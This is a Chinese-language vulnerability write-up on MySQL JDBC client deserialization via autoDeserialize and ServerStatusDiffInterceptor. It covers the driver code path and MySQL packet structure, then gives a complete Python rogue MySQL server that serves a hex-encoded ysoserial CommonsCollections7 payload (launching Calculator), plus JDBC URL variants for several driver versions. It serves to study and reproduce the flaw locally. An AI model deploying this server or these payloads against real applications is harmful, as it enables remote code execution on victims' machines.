0x01 JDBC简介
JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个规范而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现,本文中的代码都是针对MySQL数据库实现的。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
String Driver = "com.mysql.cj.jdbc.Driver";
String DB_URL="jdbc:mysql://127.0.0.1:3306/security";
Class.forName(Driver);
Connection conn = DriverManager.getConnection(DB_URL,"root","root");
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from users");
while(rs.next()){
System.out.println(rs.getString("id")+" : "+rs.getString("username"));
|
0x02 java序列化对象特征
有如下Demo:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| public class Car implements Serializable {
private String name;
public Car(){
this.name ="car";
}
public static void main(String[] args) throws IOException {
Car car=new Car();
FileOutputStream fos =new FileOutputStream("output");
ObjectOutputStream oos =new ObjectOutputStream(fos);
oos.writeObject(car);
oos.close();
}
}
|
输出文件output,看一下它的字节内容
1
2
| AC ED:STREAM_MAGIC(占两个字节)
00 05:协议版本号(占两个字节)
|
其中,AC、ED转成Signed int分别为-84和-19。
0x03 原理分析
BlackHat Europe 2019议题《New Exploit Technique In
Java Deserialization Attack》
如果攻击者能够控制JDBC连接设置项,那么就可以通过设置其指向恶意MySQL服务器进行ObjectInputStream.readObject()的反序列化攻击从而RCE。
具体点说,就是通过JDBC连接MySQL服务端时,会有几个内置的SQL查询语句要执行,其中两个查询的结果集在MySQL客户端被处理时会调用ObjectInputStream.readObject()进行反序列化操作。如果攻击者搭建恶意MySQL服务器来控制这两个查询的结果集,并且攻击者可以控制JDBC连接设置项,那么就能触发MySQL JDBC客户端反序列化漏洞。
可被利用的两条查询语句:
SHOW SESSION STATUSSHOW COLLATION
本文只分析SHOW SESSION STATUS
1.于是作者在这里盯上了com.mysql.cj.jdbc.result.ResultSetImpl.getObject(),主要看其中重要的逻辑代码,对源代码进行了部分删减。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| public Object getObject(int columnIndex) throws SQLException {
Field field = this.columnDefinition.getFields()[columnIndexMinusOne];
switch (field.getMysqlType()) {
case BIT:
if (field.isBinary() || field.isBlob()) {
byte[] data = getBytes(columnIndex);
if (this.connection.getPropertySet().getBooleanProperty(PropertyDefinitions.PNAME_autoDeserialize).getValue()) {
Object obj = data;
if ((data != null) && (data.length >= 2)) {
if ((data[0] == -84) && (data[1] == -19)) {
try {
ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
ObjectInputStream objIn = new ObjectInputStream(bytesIn);
obj = objIn.readObject();
objIn.close();
bytesIn.close();
}
}
}
return obj;
}
return data;
}
..............
|
2.现在就是找调用getObject的地方了。
作者找到了com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor.populateMapWithSessionStatusValues()方法。
ServerStatusDiffInterceptor是一个拦截器,在JDBC URL中设定属性queryInterceptors为ServerStatusDiffInterceptor时,执行查询语句会调用拦截器的preProcess和postProcess方法,进而调用populateMapWithSessionStatusValues(),然后调用resultSetToMap(),最终调用getObject()方法。
在JDBC连接数据库的过程中,会调用SHOW SESSION STATUS去查询,然后对结果进行处理的时候会调用resultSetToMap
这里还需要关注一个点getObject的columnindex的值,这个值会在后面用到。
到这里我们已经找到了一个利用链了:设置拦截器,然后进入到getObject,在getObject中,只要autoDeserialize为True,就可以进入到最后readObject中.
这也是POC中的queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true的由来。
大致流程如下:
首先是com.mysql.jdbc.Driver进行JDBC中的连接,其中会新建连接实例
连接后,接着设置对应的查询拦截器,对应的值就是我们在JDBC中设置的ServerStatusDiffInterceptor
往下,程序从MySQL服务端来初始化Properties并执行相关的SQL语句,其中判断如果查询拦截器不为空则调用查询拦截器的preProcess()函数
跟进看到,会运行查询语句SHOW SESSION STATUS,然后调用ResultSetUtil.resultSetToMap()函数,该函数中就调用了触发反序列化漏洞的getObject()函数(注意columnIndex为2时才能走到反序列化的代码逻辑,因为为1则直接返回null):
在调用getObject()函数中,判断MySQL的类型为BLOB后,就从MySQL服务端中获取对应的字节码数据
从MySQL服务端获取到字节码数据后,判断autoDeserialize是否为true、字节码数据是否为序列化对象等,最后调用readObject()触发反序列化漏洞
也就是说,当MySQL字段类型为BLOB时,会对数据进行反序列化操作,因此只要保证第1或第2字段为BLOB类型且存储了恶意序列化数据即可触发反序列化漏洞。
调用栈如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| getObject:1296, ResultSetImpl (com.mysql.cj.jdbc.result)
resultSetToMap:46, ResultSetUtil (com.mysql.cj.jdbc.util)
populateMapWithSessionStatusValues:87, ServerStatusDiffInterceptor (com.mysql.cj.jdbc.interceptors)
preProcess:105, ServerStatusDiffInterceptor (com.mysql.cj.jdbc.interceptors)
preProcess:76, NoSubInterceptorWrapper (com.mysql.cj)
invokeQueryInterceptorsPre:1138, NativeProtocol (com.mysql.cj.protocol.a)
sendQueryPacket:964, NativeProtocol (com.mysql.cj.protocol.a)
sendQueryString:915, NativeProtocol (com.mysql.cj.protocol.a)
execSQL:1182, NativeSession (com.mysql.cj)
setAutoCommit:2057, ConnectionImpl (com.mysql.cj.jdbc)
handleAutoCommitDefaults:1377, ConnectionImpl (com.mysql.cj.jdbc)
initializePropsFromServer:1322, ConnectionImpl (com.mysql.cj.jdbc)
connectOneTryOnly:963, ConnectionImpl (com.mysql.cj.jdbc)
createNewIO:822, ConnectionImpl (com.mysql.cj.jdbc)
<init>:456, ConnectionImpl (com.mysql.cj.jdbc)
getInstance:240, ConnectionImpl (com.mysql.cj.jdbc)
connect:207, NonRegisteringDriver (com.mysql.cj.jdbc)
getConnection:664, DriverManager (java.sql)
getConnection:247, DriverManager (java.sql)
main:17, test (com.alter)
|
0x04 复现
思路
在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句.我们返回的结果需要是一个恶意的对象.那就是说我们需要自己写一个假的MYSQL服务。
这里就会有两种写法
- 根据
MYSQL的协议去写服务器。
恶意MySQL服务器搭建可参考:
https://github.com/fnmsd/MySQL_Fake_Server
https://github.com/rmb122/rogue_mysql_server
- 抓包,模拟发包过程.
这两种方法都使用过。这里对第二种方法,即对模拟发包的方法进行讲解。
数据包分析
准备工作
因为是在本地测试,所以需要让Wireshark能抓到本地包,执行如下命令即可
1
2
3
4
| whoami #获取用户名 如:123456
cd /dev #进入/dev目录
sudo chown 123456:admin bp* #改变bp文件的所有者改为abc用户和admin组
可以使用ls -l bp* #保证bpf文件的权限都为123456:admin.
|
编写测试用例,确保可以链接本地数据库
1
2
3
4
5
6
7
8
9
10
| public class test {
public static void main(String[] args) throws ClassNotFoundException, SQLException {
String Driver = "com.mysql.cj.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true";
Class.forName(Driver);
Connection conn = DriverManager.getConnection(DB_URL, "root", "***");
}
}
|
数据包分析
使用tcp.port ==3306 && mysql来过滤协议
Response OK
先看一个简单的Response OK数据包
所以Response OK的数据包内容,我们只需要发送 0700000400000002000000
问候报文
No.383是一个问候报文
直接把数据发送过去就行。
show session status响应包的编写
如果要自己编写poc,还是要看了解MySQL私有协议。这里会简单分析一下。
从流量中可以看出来show session status属于request Query报文。对于查询数据包的响应包可以分为四种:
- 错误包(
ERR Packet)
- 正确包(
OK Packet)
Protocol::LOCAL_INFILE_Request- 结果集(
ProtocolText::Resultset)
我们上面看到的Response OK数据包就是OK packet。
这一部分我们主要是用的是结果集这个数据包。这里给出官方例子
结果集响应包的结构如图所示。
上面的官方图说明了一个结果集响应包的结构。
- 数据段1:说明下面的结果集有多少列
- 数据段2:列的定义
- 数据段3:
EOF 包
- 数据段4:行数据
数据段的结构也是相似的。 长度(3字节) 序号(1字节) 协议数据(不同协议,数据不同)
- 数据段
1就可以写成01 00 00 01 02前三字节表示数据长度,sequence id为1,最后一字节02表示有两列(因为尝试写一列无法正常运行)
- 数据段
2,列的定义就比较复杂了。拿我写好的数据直接分析吧1a000002036465660001630163016301630c3f00ffff0000fcffff0000001
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| 1a 00 00
02
03646566
00
01 63
01 63
0163
0163
0c filler
3f00
ffff0000 column_length
fc
9000
00
0000
|
poc没有写EOF包。看的分析说加上就无法复现成功。不知道原因。所以我这里也没有加- 数据字段4就是
POC了。POC其实和上面一样的。计算出长度(3字节)序号(1字节)行数据(行数据第一个字节是数据的长度)
POC使用ysoserial CommonsCollections7
poc
这里使用Tri0mphe师傅的poc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
| import socket
import binascii
import os
greeting_data="4a0000000a382e302e3238000e00000048174a6e4319014800ffffff0200ffdf15000000000000000000006b36062a6041016b54215b4a0063616368696e675f736861325f70617373776f726400"
response_ok_data="0700000400000002000000"
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()
def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def get_payload_content():
file= r'calc.ser'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")
else:
print("open false")
payload_content='ACED0005737200136A6176612E7574696C2E486173687461626C6513BB0F25214AE4B803000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000877080000000B000000027372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001700000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E00177371007E000F7571007E001400000002707571007E001400000000740006696E766F6B657571007E001700000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00147371007E000F757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400126F70656E202D612043616C63756C61746F72740004657865637571007E00170000000171007E001C7371007E000A737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001740002797971007E002F787871007E002F7371007E000271007E00077371007E00303F4000000000000C770800000010000000017400027A5A71007E002F78787371007E002D0000000278'
return payload_content
def run():
while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))
send_data(conn,greeting_data)
while True:
receive_data(conn)
send_data(conn,response_ok_data)
data=receive_data(conn)
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
payload_content=get_payload_content()
payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break
if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3309
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)
print("start fake mysql server listening on {}:{}".format(HOST,PORT))
run()
|
JDBC_Client
1
2
3
4
5
6
7
8
9
10
11
| public class JdbcClient {
public static void main(String[] args) throws Exception{
String driver = "com.mysql.cj.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true";
Class.forName(driver);
Connection conn = DriverManager.getConnection(DB_URL);
}
}
|
测试结果
0x05 其他payload
ServerStatusDiffInterceptor触发点
8.x
如上述Demo:
6.x
属性名不同,queryInterceptors换为statementInterceptors:
>=5.1.11
包名中没有cj:
使用工具测试通过,修改config.json文件,然后将user改成yso_payload类型_命令
但是弹出6个计算器
5.x <= 5.1.10
同上,但需要连接后执行查询。
detectCustomCollations触发点
5.1.29 - 5.1.40
5.1.28 - 5.1.19
0x06 本文用到的文件
https://github.com/altEr1125/altEr1125.github.io/tree/master/file/MySQL%20JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96
0x07 Reference
https://xz.aliyun.com/t/8159
https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#%E5%90%84%E7%A7%8Dpayload%E5%B0%8F%E7%BB%93
https://www.anquanke.com/post/id/203086
